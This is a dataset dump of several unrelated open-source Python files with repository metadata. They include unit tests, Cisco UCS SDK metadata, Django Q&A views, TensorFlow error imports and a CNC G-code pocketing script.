6826c1f6a09f7b06ef7a2f2506da4f8233577248 | 880aeff2ae5d70c8a01c11f0c0d9f6154d390229 | /tests/test_scale_limits.py | 8a20d5b5de56b50c95df85b6a97b1f3ff8c79f99 | [
"CC0-1.0"
] | permissive | bellyfat/ccxt_rate_limiter | 8799c097589de876040521573f382f1615260609 | d37d675829eb2c1b89980c5001022b63c554ed90 | refs/heads/master | 2023-04-12T22:15:28.280063 | 2021-04-21T04:57:14 | 2021-04-21T04:57:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | from unittest import TestCase
from ccxt_rate_limiter import scale_limits
class TestScaleLimits(TestCase):
def test_scale_limits(self):
result = scale_limits([
{
'tag': 'tag1',
'period_sec': 1,
'count': 10,
},
{
'tag': 'tag2',
'period_sec': 1,
'count': 20,
},
], 0.1)
self.assertEqual(result, [
{
'tag': 'tag1',
'period_sec': 1,
'count': 1,
},
{
'tag': 'tag2',
'period_sec': 1,
'count': 2,
},
])
def test_input_not_changed(self):
input = [
{
'tag': 'tag1',
'period_sec': 1,
'count': 10,
},
]
scale_limits(input, 0.1)
self.assertEqual(input, [
{
'tag': 'tag1',
'period_sec': 1,
'count': 10,
},
])
| [
"a@example.com"
] | a@example.com |
0987bb7dede5a91338e72049a78083b1e8ac34ff | ef6229d281edecbea3faad37830cb1d452d03e5b | /ucsmsdk/methodmeta/PolicySetCentraleStorageMeta.py | e59ff3cebcf9e73fcfaa63776c0f7540eff10df3 | [
"Apache-2.0"
] | permissive | anoop1984/python_sdk | 0809be78de32350acc40701d6207631322851010 | c4a226bad5e10ad233eda62bc8f6d66a5a82b651 | refs/heads/master | 2020-12-31T00:18:57.415950 | 2016-04-26T17:39:38 | 2016-04-26T17:39:38 | 57,148,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | """This module contains the meta information of PolicySetCentraleStorage ExternalMethod."""
import sys, os
from ..ucscoremeta import MethodMeta, MethodPropertyMeta
method_meta = MethodMeta("PolicySetCentraleStorage", "policySetCentraleStorage", "Version142b")
prop_meta = {
"cookie": MethodPropertyMeta("Cookie", "cookie", "Xs:string", "Version142b", "InputOutput", False),
"in_data": MethodPropertyMeta("InData", "inData", "Xs:string", "Version142b", "Input", False),
"in_oper": MethodPropertyMeta("InOper", "inOper", "Xs:unsignedInt", "Version142b", "Input", False),
"in_side": MethodPropertyMeta("InSide", "inSide", "Xs:string", "Version142b", "Input", False),
"out_data": MethodPropertyMeta("OutData", "outData", "Xs:string", "Version142b", "Output", False),
}
prop_map = {
"cookie": "cookie",
"inData": "in_data",
"inOper": "in_oper",
"inSide": "in_side",
"outData": "out_data",
}
| [
"test@cisco.com"
] | test@cisco.com |
8e7744daac894e64ea037091c80cf88a8cc3ce3e | 3d962ed6a8d35929b1f24b8654634abef957f0c9 | /src/qanda/views.py | a3ef2751e4208ff6d1b938a708963272d9a31004 | [] | no_license | Michaeltetteh/stackoverflowclone | 44a98ac9c809b5597bf30921166fcc66961a3a16 | 7d086f3aa3098eb6636145f2c3ba43168275cc8a | refs/heads/master | 2020-06-07T03:33:43.664983 | 2019-07-12T18:59:46 | 2019-07-12T18:59:46 | 192,911,917 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,176 | py | from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import (
CreateView,
DetailView,
RedirectView,
DayArchiveView,
UpdateView,
TemplateView,
)
from django.shortcuts import render
from .forms import (
QuestionForm,
AnswerForm,
AnswerAcceptanceForm,
)
from .models import Question,Answer
from django.http import HttpResponseBadRequest
from django.urls import reverse
from django.utils import timezone
from .service.elasticsearch import search_for_questions
class AskQuestionView(LoginRequiredMixin,CreateView):
form_class = QuestionForm
template_name = 'qanda/ask.html'
def get_initial(self):
return {
'user': self.request.user.id
}
def form_valid(self,form):
action = self.request.POST.get('action')
if action == 'SAVE':
return super().form_valid(form)
elif action == 'PREVIEW':
preview = Question(
question = form.cleaned_data['question'],
title = form.cleaned_data['title']
)
ctx = self.get_context_data(preview=preview)
return self.render_to_response(context=ctx)
return HttpResponseBadRequest()
class QuestionDetailView(DetailView):
model = Question
ACCEPT_FORM = AnswerAcceptanceForm(initial={'accepted':True})
REJECTED_FORM = AnswerAcceptanceForm(initial={'accepted': False})
def get_context_data(self,**kwargs):
ctx = super().get_context_data(**kwargs)
ctx.update({
'answer_form': AnswerForm(initial={
'user': self.request.user.id,
'question': self.object.id,
})
})
if self.object.can_accept_answers(self.request.user):
ctx.update({
'accept_form': self.ACCEPT_FORM,
'reject_form': self.REJECTED_FORM,
})
return ctx
class CreateAnswerView(LoginRequiredMixin,CreateView):
form_class = AnswerForm
template_name = 'qanda/create_answer.html'
def get_initial(self):
return {
'question': self.get_question().id,
'user': self.request.user.id,
}
def get_context_data(self,**kwargs):
return super().get_context_data(question=self.get_question(),**kwargs)
def get_success_url(self):
return self.object.question.get_absolute_url()
def form_valid(self,form):
action = self.request.POST.get('action')
if action == 'SAVE':
return super().form_valid(form)
elif action == 'PREVIEW':
ctx = self.get_context_data(preview=form.cleaned_data['answer'])
return self.render_to_response(context=ctx)
return HttpResponseBadRequest()
def get_question(self):
return Question.objects.get(pk=self.kwargs['pk'])
class UpdateAnswerAccepetance(LoginRequiredMixin,UpdateView):
form_class = AnswerAcceptanceForm
queryset = Answer.objects.all()
template_name = "qanda/common/list_answers.html"
def get_success_url(self):
return self.object.question.get_absolute_url()
def form_invalid(self,form):
return HttpResponseBadRequest(
redirect_to=self.object.question.get_absolute_url()
)
class DailyQuestionList(DayArchiveView):
queryset = Question.objects.all()
date_field = 'created'
month_format = '%m'
allow_empty = True
class TodaysQuestionList(RedirectView):
def get_redirect_url(self, *args, **kwargs):
today = timezone.now()
return reverse('qanda:daily_questions',
kwargs={
'day': today.day,
'month': today.month,
'year': today.year,
}
)
class SearchView(TemplateView):
template_name = 'qanda/search.html'
def get_context_data(self,**kwargs):
query = self.request.GET.get('q',None)
ctx = super().get_context_data(query=query,**kwargs)
if query:
result = search_for_questions(query)
ctx['hits'] = result
return ctx
| [
"miketetteh751@outlook.com"
] | miketetteh751@outlook.com |
127cf91a36cce18269d93f055cf62345174901b7 | 45870a80cbe343efe95eb9e8d0bd47c8c88353d1 | /特殊的函数/venv/Lib/site-packages/tensorflow/tools/api/generator/api/errors/__init__.py | ef90b8fb905ffd54a01f8504bd2d3b233f1a0383 | [] | no_license | pippichi/IntelliJ_PYTHON | 3af7fbb2c8a3c2ff4c44e66736bbfb7aed51fe88 | 0bc6ded6fb5b5d9450920e4ed5e90a2b82eae7ca | refs/heads/master | 2021-07-10T09:53:01.264372 | 2020-07-09T13:19:41 | 2020-07-09T13:19:41 | 159,319,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,608 | py | """Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python import OpError
from tensorflow.python.framework.errors import AbortedError
from tensorflow.python.framework.errors import AlreadyExistsError
from tensorflow.python.framework.errors import CancelledError
from tensorflow.python.framework.errors import DataLossError
from tensorflow.python.framework.errors import DeadlineExceededError
from tensorflow.python.framework.errors import FailedPreconditionError
from tensorflow.python.framework.errors import InternalError
from tensorflow.python.framework.errors import InvalidArgumentError
from tensorflow.python.framework.errors import NotFoundError
from tensorflow.python.framework.errors import OutOfRangeError
from tensorflow.python.framework.errors import PermissionDeniedError
from tensorflow.python.framework.errors import ResourceExhaustedError
from tensorflow.python.framework.errors import UnauthenticatedError
from tensorflow.python.framework.errors import UnavailableError
from tensorflow.python.framework.errors import UnimplementedError
from tensorflow.python.framework.errors import UnknownError
from tensorflow.python.framework.errors import error_code_from_exception_type
from tensorflow.python.framework.errors import exception_type_from_error_code
from tensorflow.python.framework.errors import raise_exception_on_not_ok_status
from tensorflow.python.framework.errors_impl import ABORTED
from tensorflow.python.framework.errors_impl import ALREADY_EXISTS
from tensorflow.python.framework.errors_impl import CANCELLED
from tensorflow.python.framework.errors_impl import DATA_LOSS
from tensorflow.python.framework.errors_impl import DEADLINE_EXCEEDED
from tensorflow.python.framework.errors_impl import FAILED_PRECONDITION
from tensorflow.python.framework.errors_impl import INTERNAL
from tensorflow.python.framework.errors_impl import INVALID_ARGUMENT
from tensorflow.python.framework.errors_impl import NOT_FOUND
from tensorflow.python.framework.errors_impl import OK
from tensorflow.python.framework.errors_impl import OUT_OF_RANGE
from tensorflow.python.framework.errors_impl import PERMISSION_DENIED
from tensorflow.python.framework.errors_impl import RESOURCE_EXHAUSTED
from tensorflow.python.framework.errors_impl import UNAUTHENTICATED
from tensorflow.python.framework.errors_impl import UNAVAILABLE
from tensorflow.python.framework.errors_impl import UNIMPLEMENTED
from tensorflow.python.framework.errors_impl import UNKNOWN | [
"874496049@qq.com"
] | 874496049@qq.com |
7723b40c756b824d50377be7a404363e77475980 | d3192b76f276d5102b231baf470f32d39a5e4854 | /test/StimulusSelector_tests.py | 2bf4a0c195b04eb5a0c9e5d1bc93d9af884989f2 | [] | no_license | drordotan/trajtracker | 874529e1c253f6d2c7527967616adf1c03977e05 | f76693c14d649899cfab5b2bbad4835dbf1cd15c | refs/heads/master | 2021-06-15T05:31:06.404147 | 2017-03-27T18:49:21 | 2017-03-27T18:49:21 | 81,454,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | import unittest
import trajtracker
from trajtracker.stimuli import StimulusSelector
from ttrk_testing import DummyStimulus
class StimulusSelectorTests(unittest.TestCase):
def test_select(self):
a = DummyStimulus()
b = DummyStimulus()
sel = StimulusSelector([["a", a], ["b", b]])
self.assertIsNone(sel.active_stimulus)
sel.activate("a")
self.assertEqual(a, sel.active_stimulus)
sel.activate("b")
self.assertEqual(b, sel.active_stimulus)
def test_select_invalid(self):
a = DummyStimulus()
sel = StimulusSelector([["a", a]])
self.assertRaises(ValueError, lambda: sel.activate("c"))
if __name__ == '__main__':
unittest.main()
| [
"dror.dotan@gmail.com"
] | dror.dotan@gmail.com |
529315e1618e7474cbfb659adba1527cede96ec3 | dae7646a7780d471c32ec9dbe637445aa039b082 | /cnc/flybox_178x133x10/slots/fixture/pocket.py | d19d779125c2ccc3438e9b9350e9f2da6e3e35d9 | [
"Apache-2.0"
] | permissive | iorodeo/flybox_two_chamber | 249dc805074a7c5d2d9d7a8ebec7c3e9c18a792d | d3e24b3fded55308fff8bb95abb2ed97cb2d4465 | refs/heads/master | 2022-11-09T20:31:37.968775 | 2015-04-23T00:56:58 | 2015-04-23T00:56:58 | 273,790,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,250 | py | from __future__ import print_function
import os
import sys
from py2gcode import gcode_cmd
from py2gcode import cnc_dxf
feedrate = 150.0
fileName = 'flybox_178x133x10.dxf'
depth = 0.120
startZ = 0.0
safeZ = 0.5
overlap = 0.5
overlapFinish = 0.6
maxCutDepth = 0.15
toolDiam = 0.5
cornerCut = True
direction = 'ccw'
startDwell = 1.0
prog = gcode_cmd.GCodeProg()
prog.add(gcode_cmd.GenericStart())
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.FeedRate(feedrate))
param = {
'fileName' : fileName,
'layers' : ['POCKET'],
'components' : True,
'depth' : depth,
'startZ' : startZ,
'safeZ' : safeZ,
'overlap' : overlap,
'overlapFinish' : overlapFinish,
'maxCutDepth' : maxCutDepth,
'toolDiam' : toolDiam,
'cornerCut' : cornerCut,
'direction' : direction,
'startDwell' : startDwell,
}
pocket = cnc_dxf.DxfRectPocketFromExtent(param)
prog.add(pocket)
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.End(),comment=True)
baseName, dummy = os.path.splitext(__file__)
fileName = '{0}.ngc'.format(baseName)
print('generating: {0}'.format(fileName))
prog.write(fileName)
| [
"will@iorodeo.com"
] | will@iorodeo.com |
fbfc6ebef270cae196f812b58597f0589713b520 | 1610e03bc2b9b8419e11824079de3c8636f3a039 | /0x0A-python-inheritance/1-my_list.py | 4db9209230a10b8ff001d267f86007a96f27b635 | [] | no_license | Andresmelek/holbertonschool-higher_level_programming | 12afc1d94b1cd8dcdcfbeb1f9dc819999506afb8 | a1969506f346b808450e33f91d37790732ee7c57 | refs/heads/master | 2020-09-28T23:40:49.866556 | 2020-05-14T17:52:53 | 2020-05-14T17:52:53 | 226,893,592 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 133 | py | #!/usr/bin/python3
"""
Subclas my list from list.
"""
class MyList(list):
def print_sorted(self):
print(sorted(self))
| [
"candres.isaza@gmail.com"
] | candres.isaza@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.